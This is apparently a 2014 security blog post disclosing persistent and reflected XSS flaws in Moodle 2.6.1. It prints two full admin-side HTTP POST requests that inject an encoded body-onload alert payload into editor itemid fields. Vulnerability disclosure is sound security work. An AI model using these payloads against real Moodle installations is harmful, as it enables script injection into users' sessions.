Thursday, 27 February 2014

[EN] Moodle 2.6.1 XSS

During last tests I found that latest version of Moodle is vulnerable to XSS.

Check it out:

# ==============================================================
# Title ...| Moodle 2.6.1 XSS
# Version .| (Feb 27  2014) moodle-latest-26.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://download.moodle.org
# ==============================================================

[+] From admin user:

# ==============================================================
# 1. Persistent XSS

---<request>---
POST /k/cms/moodle/course/edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 988

returnto=topcat&mform_isexpanded_id_descriptionhdr=1&addcourseformatoptionshere=&enablecompletion=0&id=&sesskey=TCxmENhHwt&_qf__course_edit_form=1&mform_isexpanded_id_general=1&mform_isexpanded_id_courseformathdr=0&mform_isexpanded_id_appearancehdr=0&mform_isexpanded_id_filehdr=0&mform_isexpanded_id_enrol_guest_header_0=0&mform_isexpanded_id_groups=0&mform_isexpanded_id_rolerenaming=0&fullname=startowy&shortname=startowy&category=1&visible=1&startdate%5Bday%5D=28&startdate%5Bmonth%5D=2&startdate%5Byear%5D=2014&idnumber=&summary_editor%5Btext%5D=%3Cp%3Estartowy%3C%2Fp%3E&summary_editor%5Bformat%5D=1&summary_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&overviewfiles_filemanager=41075595&format=weeks&numsections=10&hiddensections=0&coursedisplay=0&lang=&newsitems=5&showgrades=1&showreports=0&maxbytes=0&enrol_guest_status_0=1&groupmode=0&groupmodeforce=0&defaultgroupingid=0&role_1=&role_2=&role_3=&role_4=&role_5=&role_6=&role_7=&role_8=&submitbutton=Save+changes
---<request>---


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/moodle/group/group.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 361

id=&courseid=5&sesskey=cik7wECmff&_qf__group_form=1&mform_isexpanded_id_general=1&name=aaaaaaaaaaaaaa&idnumber=&description_editor%5Btext%5D=%3Cp%3Eaaaaaaaaaaaaaaaaaaaaaaa%3C%2Fp%3E&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&enrolmentkey=&hidepicture=0&imagefile=801633198&submitbutton=Save+changes
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

1 comment:

What do You think...?